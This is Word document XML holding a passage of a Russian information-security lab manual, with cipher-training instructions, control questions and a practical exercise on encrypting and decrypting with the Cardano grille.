      </w:r>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:color w:val="FF00FF"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Для шифрования текста используется искомая (скрытая) таблица шифрования. За каждый открытый символ начисляется 1 балл. Для получения в соответствующей зашифрованной строке расшифрованную строку, необходимо нажать на кнопку «Показать». При этом в области результата подсказки, расположенной рядом с кнопкой «Показать», будет выведен результат расшифрования зашифрованной строки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="32"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Выбор подсказки «ЗАШИФРОВАТЬ ТЕКСТ»  подразумевает, что пользователь сам вводит с клавиатуры те символы из зашифрованного текста, расшифрованное значение которых поможет ему дешифровать зашифрованный текст. Эта ситуацию соответствует ограниченному доступу дешифровальщика к шифровальной машине. За каждый зашифрованный символ дается 2 балла. Этот вид подсказки позволяет студенту самому выбирать символы, которые необходимо зашифровать, и, следовательно, получить их шифры. Символы из зашифрованного текста следует вводить в окно редактирования, расположенное рядом с подсказкой «Зашифровать текст». Расшифрованное значение этих символов выводится при нажатии кнопки «Показать» в область результата подсказок, расположенное рядом с кнопкой «Показать». Эта подсказка аналогична подсказке «СИМВОЛ», но для нескольких символов одновременно.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Все выбранные пользователем значения подсказок накапливаются в окне «Использованные подсказки», которое расположено справа внизу на форме. Это сделано для того, чтобы обучаемый видел все подсказки, использованные им, и смог их применить для дешифрования зашифрованного текста. При этом имеется возможность пролистывать окно результатов помощи. Область результатов является текстовым полем, доступным только для чтения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>В этом разделе, как и в предыдущих, пользователь может работать в двух режимах: задание на оценку и задание без оценки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Оценка выполнения раздела «Дешифрования» формируется на основании суммарного числа «штрафных» баллов, набранных в процессе полного дешифрования текста и использованного числа попыток дешифрования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> </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pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Что понимают под безопасностью АСОИ?(самостоятельная работа)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Что понимают под</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> доступом к информации?</w:t>
      </w:r>
      <w:r w:rsidRPr="005067E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(самостоятельная работа)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Что такое санкционированный доступ к информации?</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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Что такое несанкционированный доступ к информации?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Перечислите типы безопасности АСОИ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Какие существуют меры обеспечения безопасности компьютерных систем?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>4.           Выполните дешифрование текста (допускается 2 ошибки)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>5.           Выполните дешифрование текста без ошибок</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pP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pStyle w:val="1"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="l2"/>
      <w:bookmarkStart w:id="108" w:name="_Toc3811323"/>
      <w:bookmarkEnd w:id="107"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Практическая</w:t>
      </w:r>
      <w:r w:rsidRPr="001B484F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>работа №2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="108"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:bookmarkStart w:id="109" w:name="_Toc3811324"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Шифрование информации методом «Решетки Кардано»</w:t>
      </w:r>
      <w:bookmarkEnd w:id="109"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="bodytext2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель работы: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>изучение порядка зашифрования и расшифрования информации методом «Решетки Кардано», а также получения навыков по дешифрованию информации, зашифрованной данным методом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Теоретическое обоснование</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="bodytext2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В данной лабораторной работе изучается шифрование информации методом «Решетки Кардано». Данный шифр относится к группе шифров перестановки. Используется квадратная решетка размером n*n, в которой сделаны вырезы определенным образом. Эти вырезы должны быть выбраны таким образом, чтобы при последовательном повороте маски по часовой стрелке на 90 градусов они не накладывались друг на друга и покрыли всю таблицу. При использовании решетки с нечетным значением n центральная клетка не используется. Вырезы в маске и есть ключ к шифрованию информации данным методом. В вырезы маски слева направо и сверху вниз вписываются последовательно буквы из исходного текста по одной букве в каждый вырез в маске. После того как все вырезы будут заполнены, необходимо повернуть маску и выполнять предыдущие операции (заполнение и поворот) до тех пор, пока вся информация не будет зашифрована. Если одной решетки не достаточно, то используется еще одна (или несколько) точно таких же, как и первая. Потом информация из всех заполненных решеток записываетсяв виде единого текста. слева направо и сверху вниз. В итоге получится информация, зашифрованная данным методом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Методика и порядок выполнения работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="bodytext2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Прочитать теорию данного занятия, расположенную на закладке «Теория». Теоретический материал расположен в трех блоках, каждый следующий блок теории становится доступным, после того как будет прочитан предыдущий и нажата кнопка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>«Следующий». В конце последнего блока теории располагается кнопка «Изучено». Ее нажатие открывает доступ к практической части занятия.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>2. При первом выполнении занятия или при необходимости тренировочного занятия необходимо выполнить в режиме «Без оценки».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>3. После получения достаточных навыков следует выполнить занятие в режиме контрольного тестирования (режим «С оценкой»). Выполнение практической части занятия в этом режиме аналогично режиму «Без оценки», но в данном режиме выставляется оценка, которая зависит от количества допущенных ошибок.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Выбор режима выполнения занятия «С оценкой» или «Без оценки» осуществляется переключателем в правом верхнем углу страниц: «Шифрование», «Дешифрование».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4. Выполнение практической части «Шифрование» в режиме «Без оценки».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.1. Нажмите кнопку «Старт». При этом в строке состояние появится описание того, что необходимо сделать.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.2. Выберите размер таблицы (4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>4, или 5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>5, или 6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>6) и нажмите «Результат».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.3. Нажмите кнопку «Следующий».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.4. Введите полную непротиворечивую маску, такую, чтобы при повороте ее на 90 градусов по часовой стрелки 3 раза она накрыла своими вырезами все клетки и только один раз, и нажмите кнопку «Результат». Если введена не полная маска будет выдано сообщение “Маска-неполная”. Если введена противоречивая маска, то будет выведено сообщение “Маска-противоречива”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.5. Нажмите кнопку «Следующий». При этом осуществляется переход ко второму этапу работы – зашифрованию методом решетки Кардано.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.6. Используя таблицу с маской, зашифруйте текст, представленный в верхней строке окна второго этапа. В общем случае зашифровываемый текст может иметь произвольную длину. Однако особенности данного метода шифрования требуют, чтобы зашифрованный текст имел количество символов, кратное величине используемой решетки. В связи с этим практически в состав используемых символов вводтся один, означающий конец сообщения. Символы, не достающие до величины, кратной размеру используемой решетки, выбираются случайным образом. Для однозначной оценки правильности выполняемых в лабораторной работе действий принято, что символом конца ввода является *~*, а необходимыми дополняющими символами служат символы начала шифруемого текста.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Зашифрование осуществляется следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>В вырезы маски (выделенные зеленым цветом) слева направо и сверху вниз вписать буквы из исходной строки (сначала первую букву, потом вторую и т.д.) по одной букве в каждую выделенную клетку;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>После того как все вырезы будут заполнены, нажать кнопку «Повернуть маску», в режиме выполнения “Без оценки” производится проверка правильности ввода, если ввели не правильно, то выдается сообщение “Ошибка заполнения”;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Выполнять п.п. 1 и 2 до тех пор, пока вся информация не будет зашифрована.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>После ввода последнего символа зашифровываемой строки ввести символ конца ввода *~* и продолжить ввод до полного заполнения таблицы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Когда вся таблица будет заполнена, нажмите кнопку «Результат». В режиме выполнения “С оценкой” производится проверка правильности результата, если результат не правильный, то выдается сообщение “Закодировано не не верно” и показывается строка с правильным результатом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.7. Нажмите кнопку «Следующий», чтобы перейти к следующему этапу – расшифрованию информации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.8. Сначала необходимо найти начальное положение маски шифрования. Нажимая кнопку «Повернуть маску» найдите то положение маски, при котором информация в вырезах решетки будет иметь смысл, и нажмите «Результат».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.9. Теперь необходимо расшифровать информацию, занесенную в таблице.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Расшифровка осуществляется следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Выпишите из таблицы в строку 1 этапа "Расшифрование" те символы, которые попадают в вырезы маски (маска выделяется зеленым цветом). Выписывать символы следует слева направо и сверху вниз. После выписывания всех открытых символов нажимать клавишу "Повернуть решетку".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Выполнять п.1 до тех пор, пока вся информация не будет расшифрована (то есть операция "Повернуть решетку" должна быть обязательно выполнена 4 раза).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Когда вся информация будет расшифрована, нажмите кнопку «Результат».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>На этом выполнение практической части занятия «Шифрование» в режиме «Без оценки» закончено. Если занятие выполнялся в режиме “С оценкой”, то производится проверка правильности результата. Если результат не верен, то выдается сообщение “Раскодировано не правильно” и показывается строка, в которой приводится правильный ответ (расшифрованная информация).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>5. Выполнение практической части «Шифрование» в режиме «С оценкой». Выполняется так же, как и в режиме «Без оценки», но в конце выполнения практической части будет выставлена оценка, исходя из количества допущенных ошибок.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>6. Выполнение практической части «Дешифрование» в режиме «Без оценки».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>6.1. Нажмите кнопку «Старт».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>6.2. Выберите размер таблицы (4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>4, или 5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>5, или 6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>6) и нажмите кнопку «Зафиксировать». Выбор осуществляется на основе анализа предложенной строки для дешифрования:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>– если в строке 16 символов, то следует выбрать таблицу 4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
